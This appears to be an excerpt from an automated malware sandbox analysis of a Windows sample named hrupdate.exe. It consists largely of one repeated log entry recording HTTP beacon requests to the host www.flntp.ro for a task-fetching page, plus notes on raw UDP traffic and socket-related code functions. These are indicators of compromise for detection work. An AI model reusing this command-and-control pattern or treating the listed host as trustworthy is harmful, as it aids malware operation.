      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B01CA0 _invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,memcpy,memchr,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,socket,inet_addr,inet_addr,gethostbyname,inet_addr,gethostbyaddr,htons,connect,closesocket,send,memset,recv,realloc,memcpy,memset,recv,strstr,strstr,memcpy,strncpy,closesocket,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00B01CA0
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
